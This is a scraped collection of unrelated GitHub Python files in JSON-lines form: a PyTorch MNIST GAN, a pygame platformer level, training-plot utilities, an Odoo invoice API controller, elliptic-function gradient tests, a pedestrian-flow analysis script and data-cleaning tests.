0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\n# MNIST dataset\nmnist = datasets.MNIST(root='/tmp/',\n train=True,\n transform=transform,\n download=True)\n# Data loader\ndata_loader = torch.utils.data.DataLoader(dataset=mnist,\n batch_size=batch_size,\n shuffle=True)\n\nD = nn.Sequential(\n nn.Linear(784, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1),\n nn.Sigmoid()\n)\n\n\ndef g_layer(in_size, out_size, normalize=True):\n layers = [nn.Linear(in_size, out_size)]\n\n if normalize:\n layers.append(nn.BatchNorm1d(out_size, 0.8))\n\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n\n return layers\n\n\nG = nn.Sequential(\n *g_layer(noise_size, 128, normalize=False),\n *g_layer(128, 256),\n *g_layer(256, 512),\n *g_layer(512, 1024),\n nn.Linear(1024, 784),\n nn.Tanh()\n)\n\nbce_loss = nn.BCELoss()\nd_optimizer = torch.optim.Adam(D.parameters(), lr=0.0002)\ng_optimizer = torch.optim.Adam(G.parameters(), lr=0.0002)\n\nif torch.cuda.is_available():\n D.cuda()\n G.cuda()\n\nfor epoch in range(total_epoch):\n pbar = tqdm(data_loader)\n pbar.set_description('{}'.format(epoch))\n\n for x, _ in pbar:\n # input data\n curr_batch = x.size(0)\n x = to_var(x)\n x_data = to_var(x.view(curr_batch, -1))\n sample_noise = to_var(get_noise(curr_batch))\n\n # label\n one_label = Variable(torch.ones(x_data.size(0), 1), requires_grad=False).cuda()\n zero_label = Variable(torch.zeros(x_data.size(0), 1), requires_grad=False).cuda()\n\n fake_img = G(sample_noise)\n\n # discriminator\n d_optimizer.zero_grad()\n # g_optimizer.zero_grad()\n\n real_loss = bce_loss(D(x_data), one_label)\n fake_loss = bce_loss(D(fake_img), zero_label)\n\n d_loss = (real_loss + fake_loss) / 2\n\n d_loss.backward(retain_graph=True)\n d_optimizer.step()\n\n # generator\n g_optimizer.zero_grad()\n # d_optimizer.zero_grad()\n\n g_loss = bce_loss(D(fake_img), one_label)\n\n g_loss.backward()\n g_optimizer.step()\n\n fake_images = fake_img.view(fake_img.size(0), 1, 28, 28)\n save_image(fake_images, '{}.png'.format(epoch), normalize=True)\n","repo_name":"yongjun823/style-to-go","sub_path":"gan/gan_pytorch.py","file_name":"gan_pytorch.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10995238564","text":"import pygame # Imports Pygame\n\nfrom decoration import Sky # Imports class Sky\nfrom enemy import Enemy # Imports class Enemy\nfrom game_data import levels # Imports levels dictionary\nfrom player import Player # Import class Player\nfrom settings import tile_size, screen_width, screen_height # Import settings\nfrom support import import_csv_layout, import_cut_graphics # Import functions from support\nfrom tiles import Tile, StaticTile # Imports classes from tiles\n\n\nclass Level: # Class that contains all level information\n def __init__(self, current_level, surface, create_overworld, change_coins, change_health): # Class arguments\n # Level base\n self.background = pygame.image.load('../graphics/terrain/background_0.png')\n self.display_surface = surface\n self.world_shift = 0\n self.current_x = None\n\n #Audio\n self.coin_sound = pygame.mixer.Sound('../audio/effects/coin.wav')\n self.coin_sound.set_volume(0.2)\n self.stomp_sound = pygame.mixer.Sound('../audio/effects/stomp.wav')\n\n # Defines overworld arguments\n self.create_overworld = create_overworld\n self.current_level = current_level\n level_data = levels[self.current_level]\n self.new_max_level = level_data['unlock']\n\n 
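# --- editor's note: hedged aside on the GAN training loop in the preceding
# record. With BCELoss, the objectives it implements are
#   L_D = -1/2 [ log D(x) + log(1 - D(G(z))) ]   (real_loss + fake_loss over 2)
#   L_G = -log D(G(z))                            (non-saturating generator loss)
# A minimal standalone check that BCE against an all-ones label is exactly
# -log D:
import torch
import torch.nn as nn

bce = nn.BCELoss()
p = torch.tensor([0.8])  # a discriminator output
assert torch.isclose(bce(p, torch.ones(1)), -torch.log(p))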
# Player Setup\n player_layout = import_csv_layout(level_data['player'])\n self.player = pygame.sprite.GroupSingle()\n self.goal = pygame.sprite.GroupSingle()\n self.player_setup(player_layout, change_health)\n\n # Terrain setup\n terrain_layout = import_csv_layout(level_data['terrain'])\n self.terrain_sprites = self.create_tile_group(terrain_layout, 'terrain')\n\n #User interface\n self.change_coins = change_coins\n\n # Coin Setup\n coin_layout = import_csv_layout(level_data['coins'])\n self.coin_sprites = self.create_tile_group(coin_layout, 'coins')\n\n # Enemy\n enemy_layout = import_csv_layout(level_data['enemies'])\n self.enemy_sprites = self.create_tile_group(enemy_layout, 'enemies')\n\n # Constraint\n constraint_layout = import_csv_layout(level_data['constraints'])\n self.constraint_sprites = self.create_tile_group(constraint_layout, 'constraints')\n\n # Decoration\n self.sky = Sky(9)\n\n #Time\n current_time = pygame.time.get_ticks()\n\n def create_tile_group(self, layout, type): # Creates the tile logic in game\n sprite_group = pygame.sprite.Group()\n\n for row_index, row in enumerate(layout):\n for col_index, val in enumerate(row):\n if val != '-1': # If csv number is -1\n x = col_index * tile_size\n y = row_index * tile_size # Creates blank space\n\n if type == 'terrain': # If CSV data is type 'terrain'\n terrain_tile_list = import_cut_graphics('../graphics/terrain/terrain.png')\n tile_surface = terrain_tile_list[int(val)]\n sprite = StaticTile(tile_size, x, y, tile_surface) # Create tile groupset\n\n if type == 'coins': # If CSV data type is 'coins'\n coin_tile_list = import_cut_graphics('../graphics/coins/diamond_1.png')\n coin_surface = coin_tile_list[int(val)]\n sprite = StaticTile(tile_size, x, y, coin_surface) # Create coin tile groupset\n\n if type == 'enemies': # If CSV data type is 'enemies'\n sprite = Enemy(tile_size, x, y) # Render sprite and borrow arguments from Class Enemy\n\n if type == 'constraints': # If CSV data type is ;constraints'\n sprite = Tile(tile_size, x, y) # Same logic as enemy\n\n sprite_group.add(sprite) # Adds sprites\n\n return sprite_group # Evaluates sprite group\n\n\n def player_setup(self, layout, change_health):\n for row_index, row in enumerate(layout):\n for col_index, val in enumerate(row):\n x = col_index * tile_size\n y = row_index * tile_size\n if val == '0':\n sprite = Player((x, y), self.display_surface, change_health)\n self.player.add(sprite)\n\n if val == '1':\n start_surface = pygame.image.load('../graphics/character/character_start_tile.png').convert_alpha()\n sprite = StaticTile(tile_size, x, y, start_surface)\n self.goal.add(sprite)\n\n def enemy_collision_reverse(self):\n for enemy in self.enemy_sprites.sprites():\n if pygame.sprite.spritecollide(enemy, self.constraint_sprites, False):\n enemy.reverse()\n\n def horizontal_movement_collision(self):\n player = self.player.sprite\n player.collision_rect.x += player.direction.x * player.speed\n collidable_sprites = self.terrain_sprites.sprites\n\n for sprite in collidable_sprites():\n if sprite.rect.colliderect(player.collision_rect):\n if player.direction.x < 0:\n player.collision_rect.left = sprite.rect.right\n player.on_left = True\n self.current_x = player.rect.left\n elif player.direction.x > 0:\n player.collision_rect.right = sprite.rect.left\n player.on_right = True\n self.current_x = player.rect.right\n\n\n def vertical_movement_collision(self):\n player = self.player.sprite\n player.apply_gravity()\n collidable_sprites = self.terrain_sprites.sprites\n\n for sprite in 
collidable_sprites():\n if sprite.rect.colliderect(player.collision_rect):\n if player.direction.y > 0:\n player.collision_rect.bottom = sprite.rect.top\n player.direction.y = 0\n player.on_ground = True\n elif player.direction.y < 0:\n player.collision_rect.top = sprite.rect.bottom\n player.direction.y = 0\n player.on_ceiling = True\n\n if player.on_ground and player.direction.y < 0 or player.direction.y > 1:\n player.on_ground = False\n\n def scroll_x(self):\n player = self.player.sprite\n player_x = player.rect.centerx\n direction_x = player.direction.x\n\n if player_x < screen_width / 4 and direction_x < 0:\n self.world_shift = 4\n player.speed = 0\n elif player_x > screen_width - (screen_width / 4) and direction_x > 0:\n self.world_shift = -4\n player.speed = 0\n else:\n self.world_shift = 0\n player.speed = 4\n\n def check_death(self):\n if self.player.sprite.rect.top > screen_height:\n self.create_overworld(self.current_level, 0)\n\n def check_win(self):\n if pygame.sprite.spritecollide(self.player.sprite, self.goal, False):\n self.create_overworld(self.current_level, self.new_max_level)\n\n def check_coin_collisions(self):\n collided_coins = pygame.sprite.spritecollide(self.player.sprite, self.coin_sprites, True)\n if collided_coins:\n self.coin_sound.play()\n for coin in collided_coins:\n self.change_coins(1)\n\n def check_enemy_collisions(self):\n enemy_collisions = pygame.sprite.spritecollide(self.player.sprite, self.enemy_sprites, False)\n\n if enemy_collisions:\n for enemy in enemy_collisions:\n enemy_center = enemy.rect.centery\n enemy_top = enemy.rect.top\n player_bottom = self.player.sprite.rect.bottom\n if enemy_top < player_bottom < enemy_center and self.player.sprite.direction.y >= 0:\n self.stomp_sound.play()\n self.player.sprite.direction.y = -7\n enemy.kill()\n else:\n self.player.sprite.get_damage()\n\n def timer(self):\n font = pygame.font.Font('../graphics/ui/MinimalPixel v2.ttf', 50)\n current_time = pygame.time.get_ticks()\n time_surf = font.render(current_time, False, (64, 64, 64))\n time_rect = time_surf.get_rect(center=(600, 1000))\n\n\n\n def run(self): # Runs the level\n\n # decoration\n self.sky.draw(self.display_surface)\n\n # Terrain\n self.terrain_sprites.update(self.world_shift)\n self.terrain_sprites.draw(self.display_surface)\n\n # Coins\n self.coin_sprites.update(self.world_shift)\n self.coin_sprites.draw(self.display_surface)\n\n # Enemy\n self.enemy_sprites.update(self.world_shift)\n self.constraint_sprites.update(self.world_shift)\n self.enemy_collision_reverse()\n self.enemy_sprites.draw(self.display_surface)\n\n # Player Sprites\n self.player.update()\n self.horizontal_movement_collision()\n self.vertical_movement_collision()\n self.scroll_x()\n\n self.check_death()\n self.check_win()\n\n self.check_coin_collisions()\n self.check_enemy_collisions()\n\n self.player.draw(self.display_surface)\n self.goal.update(self.world_shift)\n self.goal.draw(self.display_surface)\n","repo_name":"l1menz/FALAKPLATFORMERPROJECTARYAN","sub_path":"code/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":9321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31740475558","text":"import matplotlib.pyplot as plt\nimport sys\nimport numpy as np\nimport math as m\nimport os\n\ndef addsubgraph(figshape, which, t, q1, q2, lab):\n\tplt.subplot2grid(figshape,which)\n\tplt.plot(t,q2,'r', label='test')\n\tplt.plot(t,q1,'b', 
label='train')\n\tplt.xlabel('epoch')\n\tplt.ylabel(lab)\n\tplt.grid(color='k', linestyle=':', linewidth=1)\n\tplt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left', ncol=2, mode=\"expand\", borderaxespad=0.)\n\t\t \ndef display_results(a1, a2, e1, e2, waitForGraph=False, tr_H = None, tr_Y = None, te_H = None, te_Y = None, epoch = 0, dirname = './'):\n figure = plt.figure(num='Progress of training', figsize = (15,12) if tr_H is None else (25,12))\n plt.clf()\n\n figshape = (2,2) if tr_H is None else (2,4)\n t = range(len(a1))\n addsubgraph(figshape, (0,0),t,a1,a2,'accuracy')\n addsubgraph(figshape, (1,0),t,e1,e2,'error')\n addsubgraph(figshape, (0,1),t[len(t)//2:],a1[len(t)//2:],a2[len(t)//2:],'accuracy')\n addsubgraph(figshape, (1,1),t[len(t)//2:],e1[len(t)//2:],e2[len(t)//2:],'error')\n \n if tr_H is not None:\n display_clusters(tr_H, tr_Y, te_H, te_Y, figshape, epoch)\n \n if waitForGraph:\n plt.show()\n else: \n plt.draw()\n if not os.path.isdir(dirname + 'tmp'):\n os.mkdir(dirname + 'tmp')\n \n plt.savefig(f\"{dirname}tmp/epoch_{epoch:04d}.png\")\n plt.pause(0.01)\n\ndef plotProbs(H, Y, minval, maxval):\n dif = []\n\n numclusters = 300\n counts_cor =[0 for _ in range(numclusters)]\n counts_inc =[0 for _ in range(numclusters)]\n for i in range(H.shape[0]):\n for j in range(H.shape[1]):\n num = int((H[i,j] - minval) * (numclusters + 0.0) / (maxval-minval))\n if Y[i] == j:\n counts_cor[num] += 1.0\n else:\n counts_inc[num] += 1.0 / (H.shape[1] - 1.0)\n dif.append(H[i,Y[i]] - H[i,j])\n \n plt.plot([minval + (i + 0.0) *(maxval-minval) / (numclusters + 0.0) for i in range(numclusters)], counts_cor, 'b')\n plt.plot([minval + (i + 0.0) *(maxval-minval) / (numclusters + 0.0) for i in range(numclusters)], counts_inc, 'r')\n \n minval2 = min(dif)\n maxval2 = max(dif)\n maxval2 += 0.001 * (maxval2-minval2)\n\n counts_dif =[0 for _ in range(numclusters)]\n for i in range(len(dif)):\n num = int((dif[i] - minval2) * (numclusters + 0.0) / (maxval2-minval2))\n counts_dif[num] += 1.0 / (H.shape[1] - 1.0)\n \n plt.plot([minval2 + (i + 0.0) *(maxval2-minval2) / (numclusters + 0.0) for i in range(numclusters)], counts_dif, 'g')\n\ndef display_clusters(H,Y,H_t,Y_t, figshape, epoch):\n colors = ['b','g','r','c','m','y','indigo','lime','aqua','peru']\n\n minval = min(H.min(),H_t.min())\n maxval = max(H.max(),H_t.max())\n \n maxval += 0.001 * (maxval-minval)\n\n plt.subplot2grid(figshape,(0,3))\n plotProbs(H, Y, minval, maxval)\n plt.subplot2grid(figshape,(1,3))\n plotProbs(H_t, Y_t, minval, maxval)\n\n H = np.concatenate((H,np.ones((H.shape[0],1))),axis=1)\n H_t = np.concatenate((H_t,np.ones((H_t.shape[0],1))),axis=1)\n \n Yc = []\n for i in range(len(Y)):\n Yc.append(colors[Y[i]])\n\n Yc_t = []\n for i in range(len(Y_t)):\n Yc_t.append(colors[Y_t[i]])\n\n \n Ht = np.transpose(H)\n HtH = np.matmul(Ht,H)\n iHtH = np.linalg.inv(HtH)\n iHtHHt = np.matmul(iHtH,Ht)\n\n maxcor = 0\n trans = [i for i in range(10)]\n\n YY = []\n for i in range(len(Y)):\n w = trans[Y[i]]\n tmp = [m.cos(w * 2.0 * m.pi / 10.0),m.sin(w * 2.0 * m.pi / 10.0)]\n YY.append(tmp)\n\n YY = np.array(YY)\n x = np.matmul(iHtHHt,YY)\n\n Ys = np.matmul(H,x)\n plt.subplot2grid(figshape,(0,2))\n plt.scatter(Ys[:,0], Ys[:,1], s=0.2, c=Yc, alpha=0.3)\n \n Ys_t = np.matmul(H_t,x)\n plt.subplot2grid(figshape,(1,2))\n plt.scatter(Ys_t[:,0], Ys_t[:,1], s=0.2, c=Yc_t, alpha=0.3)\n\nif __name__ == \"__main__\":\n filename = 'debug.txt'\n \n e1=[]\n a1=[]\n e2=[]\n a2=[]\n with open(filename, 'rt') as f:\n while True:\n content = f.readline()\n if 
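# --- editor's note: hedged aside on display_clusters above, which solves the
# least-squares projection by explicit normal equations, x = inv(H'H) H' Y.
# The numerically preferred one-liner is np.linalg.lstsq; quick equivalence
# check on random full-column-rank data:
import numpy as np

H = np.random.rand(50, 4)
Y = np.random.rand(50, 2)
x_normal = np.linalg.inv(H.T @ H) @ H.T @ Y
x_lstsq, *_ = np.linalg.lstsq(H, Y, rcond=None)
assert np.allclose(x_normal, x_lstsq)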
len(content) == 0:\n break\n field = content.replace('\\n','').split(',')\n\n if len(field)!=5:\n break\n\n e1.append(float(field[1]))\n a1.append(float(field[2]))\n e2.append(float(field[3]))\n a2.append(float(field[4]))\n\n print('Max train accuracy:', max(a1))\n print('Max test accuracy:', max(a2))\n print('Min train J:', min(e1))\n print('Min test J:', min(e2))\n\n display_results(a1,a2,e1,e2, True)\n","repo_name":"Axboexx/mf2android","sub_path":"utils/disp_results.py","file_name":"disp_results.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26052723296","text":"# -*- coding: utf-8 -*-\nimport logging\nimport json\n\nfrom pprint import pprint\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.osv import expression\nfrom odoo import fields\nfrom dateutil.relativedelta import relativedelta\n\n_logger = logging.getLogger(__name__)\n\n\nclass AppAccountMove(http.Controller):\n\n FIELDNAMES = ['id', 'name', 'partner_id', 'invoice_date', 'invoice_date_due', 'invoice_origin', 'amount_untaxed',\n 'amount_by_group', 'amount_total', 'amount_residual', 'reception_date_client', 'state',\n 'payment_state', 'sent_to_admin']\n FIELDFILTERS = ['id', 'partner_id', 'state']\n\n @http.route(['/app/account_move//print'], type='http', methods=['GET'], auth=\"public\",\n website=False,\n sitemap=False)\n def print_account_move(self, account_move_id, **kwargs):\n try:\n account_move = request.env['account.move'].sudo().search([('id', '=', int(account_move_id))])\n except Exception as e:\n return json.dumps({'status': 400, 'msg': str(e)})\n if account_move:\n request.uid = int(2)\n pdf, _ = request.env.ref('maxcam_account.invoice_free_form_1_id').sudo()._render_qweb_pdf([account_move.id])\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', u'%s' % len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)\n\n @http.route('/app/account_move', type='http', methods=['GET'], auth='public', website=False, sitemap=False)\n def app_account_move_movil(self, seller_id, limit=0, offset=0, partner_name=None, **kwargs):\n\n data = {'status': 200, 'msg': 'Success'}\n domain_partner = expression.AND([[('seller_id', '=', int(seller_id))]])\n \n if partner_name:\n domain_partner_name = self._get_search_domain(partner_name)\n domain_partner = expression.AND([domain_partner, domain_partner_name])\n partner = request.env['res.partner'].sudo().search(domain_partner).ids\n\n domain = expression.AND([[('seller_id', '=', int(seller_id)), ('partner_id', 'in', partner),\n ('payment_state', '!=', 'paid'), ('move_type', 'in', ['out_invoice', 'out_refund']),\n ('state', '=', 'posted')]])\n today = fields.date.today()\n expired_date = fields.Date.from_string(today) - relativedelta(days=90)\n domain_paid = expression.AND([[('seller_id', '=', int(seller_id)), ('partner_id', 'in', partner),\n ('payment_state', '=', 'paid'), ('state', '=', 'posted'),\n ('last_payment_date', '>', expired_date),\n ('move_type', 'in', ['out_invoice', 'out_refund'])]])\n for key in kwargs:\n if key in self.FIELDFILTERS:\n value = kwargs.get(key)\n domain = expression.AND([domain, [(key, '=', int(value))]])\n\n # Search Read\n account_move_ids = request.env['account.move'].sudo().search_read(domain=domain, fields=self.FIELDNAMES,\n limit=int(limit), offset=int(offset),\n order='create_date desc')\n account_move_ids_paid = request.env['account.move'].sudo().search_read(domain=domain_paid,\n 
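# --- editor's note: hedged aside on the expression.AND/OR calls in the Odoo
# controller above. Odoo domains are Polish-notation lists, and AND/OR prepend
# '&'/'|' operators. A minimal standalone imitation (NOT Odoo's real
# implementation; it assumes each input domain is already normalized, e.g.
# single-condition lists):
def and_domains(domains):
    domains = [d for d in domains if d]
    if len(domains) <= 1:
        return domains[0] if domains else []
    combined = ['&'] * (len(domains) - 1)  # one prefix operator per merge
    for d in domains:
        combined.extend(d)
    return combined

assert and_domains([[('seller_id', '=', 7)], [('state', '=', 'posted')]]) == \
    ['&', ('seller_id', '=', 7), ('state', '=', 'posted')]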
fields=self.FIELDNAMES, limit=int(limit),\n offset=int(offset),\n order='create_date desc')\n\n all_acc_move_count = request.env['account.move'].sudo().search_read(domain=domain, fields=self.FIELDNAMES,\n limit=0, offset=0, order='create_date desc')\n account_move_ids = account_move_ids + account_move_ids_paid\n self.convert_field_string(account_move_ids)\n acc_move_count = len(account_move_ids) + len(account_move_ids_paid)\n all_acc_move_count = len(all_acc_move_count)\n if acc_move_count > 0:\n data.update({'data': account_move_ids, 'count': acc_move_count, 'total_count': all_acc_move_count})\n\n else:\n data.update({'status': 204, 'msg': 'Factura no encontrada', 'count': 0, 'data': False})\n\n return json.dumps(data)\n\n @staticmethod\n def convert_field_string(account_move):\n for record in account_move:\n record.update({'invoice_date': str(record.get('invoice_date', False)),\n 'invoice_date_due': str(record.get('invoice_date_due', False)),\n 'reception_date_client': str(record.get('reception_date_client', False))})\n\n @staticmethod\n def _get_search_domain(search):\n domain = []\n if search:\n for srch in search.split(\" \"):\n domain.append([('name', 'ilike', srch)])\n\n return expression.OR(domain)\n","repo_name":"ysabelgodoydelgado/test-paquetes","sub_path":"modules/maxcam_movil/controllers/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39315999631","text":"from itertools import combinations\nfrom typing import Callable, Iterable, Union\n\nfrom hypothesis import assume, given, strategies as st\nfrom more_itertools import always_iterable\nfrom phytorch.extensions.elliptic import elliprj\nfrom pytest import mark\nfrom torch import Tensor, tensor\nfrom torch.autograd import gradcheck, gradgradcheck\n\nfrom phytorch.special.elliptic import *\nfrom phytorch.utils.complex import get_default_complex_dtype\nfrom tests.common.dtypes import with_default_double\nfrom tests.common.strategies.numbers import _cut_plane_, _positive_complex_\nfrom tests.special.test_ellipr import ELLIPR_FUNCMAP\n\n\ndef cgtensors(args, **kwargs):\n return tuple(\n tensor(arg, dtype=get_default_complex_dtype(), requires_grad=True, **kwargs)\n if arg is not None else None\n for arg in always_iterable(args)\n )\n\n\n@with_default_double\n@mark.parametrize('func, args', (\n (ellipk, 0.4), (ellipe, 0.4), (ellipd, 0.4), (ellippi, (0.7, 0.4)),\n (ellipkinc, (1.1, 0.4)), (ellipkinc, (None, 0.4, 2.5)),\n (ellipeinc, (1.1, 0.4)), (ellipeinc, (None, 0.4, 2.5)),\n (ellipdinc, (1.1, 0.4)), (ellipdinc, (None, 0.4, 2.5)),\n (ellippiinc, (0.7, 1.1, 0.4)), (ellippiinc, (0.7, None, 1.1, 2.5)),\n (elliprc, (1, 2)),\n (elliprd, (1, 2, 3)), (elliprf, (1, 2, 3)),\n (elliprg, (1, 2, 3)), (elliprj, (1, 2, 3, 4))\n))\ndef test_grads_work_at_all(func: Callable, args: Union[Tensor, Iterable[Tensor]]):\n args = cgtensors(args)\n assert gradcheck(func, args)\n assert gradgradcheck(func, args)\n\n\n@with_default_double\n@mark.parametrize('func, _, nargs', ELLIPR_FUNCMAP[:-1])\n@given(*3*(_cut_plane_(st.floats(1e-2, 1e2)),))\ndef test_ellipr_grads(func, nargs, _, x, y, z):\n args = (x, y, z)[:nargs]\n for _1, _2 in combinations(args, 2):\n assume(abs(_1-_2) > 1e-2)\n\n args = (*tensor(args, dtype=get_default_complex_dtype(), requires_grad=True),)\n assert gradcheck(func, args, raise_exception=False)\n assert gradgradcheck(func, args, 
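# --- editor's note: hedged standalone illustration of the gradcheck pattern in
# the test record above: finite-difference verification of autograd
# derivatives, which needs double precision and requires_grad inputs.
import torch
from torch.autograd import gradcheck

x = torch.randn(3, dtype=torch.double, requires_grad=True)
assert gradcheck(lambda t: (t ** 2).sum(), (x,))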
raise_exception=False)\n\n\n@with_default_double\n@given(*4*(_positive_complex_(st.floats(1e-2, 1e2)),))\ndef test_elliprj_grad(x, y, z, p):\n args = x, y, z, p\n\n for _1, _2 in combinations(args, 2):\n assume(abs(_1-_2) > 1e-2)\n args = (*tensor(args, dtype=get_default_complex_dtype(), requires_grad=True),)\n\n assert gradcheck(elliprj, args, raise_exception=False)\n assert gradgradcheck(elliprj, args, raise_exception=False)\n","repo_name":"kosiokarchev/phytorch","sub_path":"tests/special/test_elliptic_grads.py","file_name":"test_elliptic_grads.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"9732235056","text":"from os import name\nimport sys\nimport json\nimport utils\nimport analyzerFun as anl\nimport statistics as sts\n\n# Read out exit filename param if provided\nexit_files = None\nif len(sys.argv) >= 2:\n exit_files = sys.argv[1:]\n\n# Read params from config.json\nwith open(\"config.json\") as file:\n config = json.load(file)\n\ndynamic_filename = utils.read_config_param(\n config, \"dynamic_file\", lambda el : el, lambda el : True)\nexit_filename = utils.read_config_param(\n config, \"exit_file\", lambda el : el, lambda el : True)\nplot_boolean = utils.read_config_param(\n config, \"plot\", lambda el : bool(el), lambda el : True)\n\nN = utils.read_config_param(\n config, \"N\", lambda el : float(el), lambda el : el > 0)\nL = utils.read_config_param(\n config, \"L\", lambda el : float(el), lambda el : el > 0)\nd = utils.read_config_param(\n config, \"d\", lambda el : float(el), lambda el : el > 0)\n\n# Constant values\nW = 10\nLEFT_PERC_STAT_Q = 0.15\nRIGHT_PERC_STAT_Q = 0.85\n\n# Perform multiple plotting and analysis\nx_superlist, y_superlist, legend_list = [], [], []\nn_dict, t_dict = {}, {}\nr_dict = {}\nn_to_d = {200:1.2, 260:1.8, 320:2.4, 380:3.0}\n# ={1.2, 1.8, 2.4, 3.0}m y N = {200, 260, 320, 380}\nfor filename in exit_files:\n # Expected filename format: exit-N-i.txt\n name_data = filename[:-4].split('-') # Take filename without .txt extension\n n = int(name_data[1])\n \n metric = anl.analyze_dload(filename, n, L, False)\n x_superlist.append(metric.time_list)\n y_superlist.append(metric.n_list)\n legend_list.append(name_data)\n \n if n not in n_dict:\n n_dict[n] = []\n t_dict[n] = []\n n_dict[n].append(metric.n_list)\n t_dict[n].append(metric.time_list)\n\n dynamic_filename = filename.replace('exit', 'dynamic')\n rad_med = anl.get_radius_array(dynamic_filename, int(LEFT_PERC_STAT_Q * n) - W, int(RIGHT_PERC_STAT_Q * n))\n if n not in r_dict:\n r_dict[n] = []\n r_dict[n].append(rad_med)\n\nq_mean, q_dev = [], []\nr_med = []\nq_superlist, n_superlist, time_superlist, d_list = [], [], [], []\n\nfor key in n_dict.keys():\n avg_x, avg_y, err_x, q_list = anl.analyze_avg(t_dict[key], n_dict[key], n_to_d[key], W, plot_boolean)\n q_mean.append(sts.mean(q_list[int(LEFT_PERC_STAT_Q * key):int(RIGHT_PERC_STAT_Q * key)]))\n q_dev.append(sts.stdev(q_list[int(LEFT_PERC_STAT_Q * key):int(RIGHT_PERC_STAT_Q * key)]))\n r_med.append(sts.mean(r_dict[key]))\n d_list.append(n_to_d[key])\n q_superlist.append(q_list)\n time_superlist.append(avg_x[W:])\n n_superlist.append(avg_y[W:])\n\n# x_superlist.append(avg_x)\n# y_superlist.append(avg_y)\n# legend_list.append(\"promedio\")\n\nif plot_boolean:\n # Initialize plotting\n utils.init_plotter()\n\n # Plot outgoing particles f(n) + avg\n utils.plot_multiple_values(\n n_superlist,\n 'particulas salientes',\n q_superlist,\n 'caudal (1/s)',\n 
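# --- editor's note: hedged restatement of the stationary-window statistics in
# analyzerMult above (mean/stdev over the middle 15%-85% of samples, per the
# LEFT_PERC_STAT_Q / RIGHT_PERC_STAT_Q constants), as a standalone helper:
import statistics as sts

def window_stats(values, lo=0.15, hi=0.85):
    n = len(values)
    window = values[int(lo * n):int(hi * n)]
    return sts.mean(window), sts.stdev(window)

assert window_stats(list(range(100)))[0] == sts.mean(range(15, 85))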
legend_list,\n sci_y=False\n )\n\n # Plot outgoing particles f(t) + avg\n utils.plot_multiple_values(\n time_superlist,\n 'tiempo (s)',\n q_superlist,\n 'caudal (1/s)',\n legend_list,\n sci_y=False\n )\n\n utils.plot_error_bars(\n d_list,\n 'd (m)',\n q_mean, \n 'caudal (1/s)',\n q_dev, \n sci_y= False\n )\n\n utils.plot_values_with_adjust(\n d_list,\n 'd (m)',\n q_mean,\n 'caudal (1/s)',\n r_med,\n sci=False\n )\n\n utils.plot_values_with_adjust_and_err(\n d_list,\n 'd (m)',\n q_mean,\n 'caudal (1/s)',\n q_dev,\n r_med,\n sci=False\n )\n\n # Hold execution\n utils.hold_execution() \n\n\n # parsear el dynamic , tomar los radios y promediarlos entre el primer t y el ultimo","repo_name":"jtallar/pedestrian-dynamic","sub_path":"analyzerMult.py","file_name":"analyzerMult.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20492286251","text":"import pandas as pd\nimport pytest\n# src\nfrom src.data.make_preprocessing import clean_categoric_columns, clean_numeric_columns, drop_gargbage_columns, drop_nan, drop_outliers, drop_unuseful_columns, set_nan_for_numeric_outliers\n\n\n@pytest.fixture\ndef data():\n data_test = pd.read_csv('data/raw/cervezaDS.csv')\n return data_test\n\n\ndef test_set_nan_for_numeric_outliers(data):\n # Given\n data_scenario = drop_gargbage_columns(data)\n data_scenario = clean_numeric_columns(data)\n description_before = data_scenario['Efficiency'].describe()\n # When\n set_nan_for_numeric_outliers('Efficiency', data_scenario)\n description_after = data_scenario['Efficiency'].describe()\n\n # Then\n assert description_before[7] is not description_after[7]\n assert description_before[3] is not description_after[3]\n\n\ndef test_drop_nan(data):\n # Given\n len_before = len(data)\n # When\n data_scenario = drop_nan(data)\n len_after = len(data_scenario)\n\n # Then\n assert len_before is not len_after\n\n\ndef test_drop_outliers(data):\n # Given\n data_scenario = drop_gargbage_columns(data)\n data_scenario = drop_unuseful_columns(data_scenario)\n data_scenario = clean_numeric_columns(data_scenario)\n data_scenario = clean_categoric_columns(data_scenario)\n # When\n result = drop_outliers(data_scenario)\n # Then\n assert len(data_scenario) > len(result)\n\n\ndef test_clean_categoric_columns(data):\n # Given\n style_unique_categories_before = len(data['Style'].unique())\n brew_method_categories_before = len(data['BrewMethod'].unique())\n sugar_scale_categories_before = len(data['SugarScale'].unique())\n\n # When\n data_scenario = clean_categoric_columns(data)\n\n # Then\n assert style_unique_categories_before != len(\n data_scenario['Style'].unique())\n assert brew_method_categories_before != len(\n data_scenario['BrewMethod'].unique())\n assert sugar_scale_categories_before != len(\n data_scenario['SugarScale'].unique())\n\n\ndef test_clean_numeric_columns(data):\n\n # Given\n efficiency_dirty_length = len(data['Efficiency'])\n boil_gravity_dirty_length = len(data['BoilGravity'])\n fg_dirty_length = len(data['FG'])\n primary_temp_dirty_length = len(data['PrimaryTemp'])\n color_dirty_length = len(data['Color'])\n ibu_dirty_length = len(data['IBU'])\n abv_dirty_length = len(data['ABV'])\n boil_time_dirty_length = len(data['BoilTime'])\n\n data_scenario = drop_gargbage_columns(data)\n # When\n data_scenario = clean_numeric_columns(data)\n # Then\n assert data_scenario['Efficiency'].dtype == 'float'\n assert data_scenario['BoilGravity'].dtype == 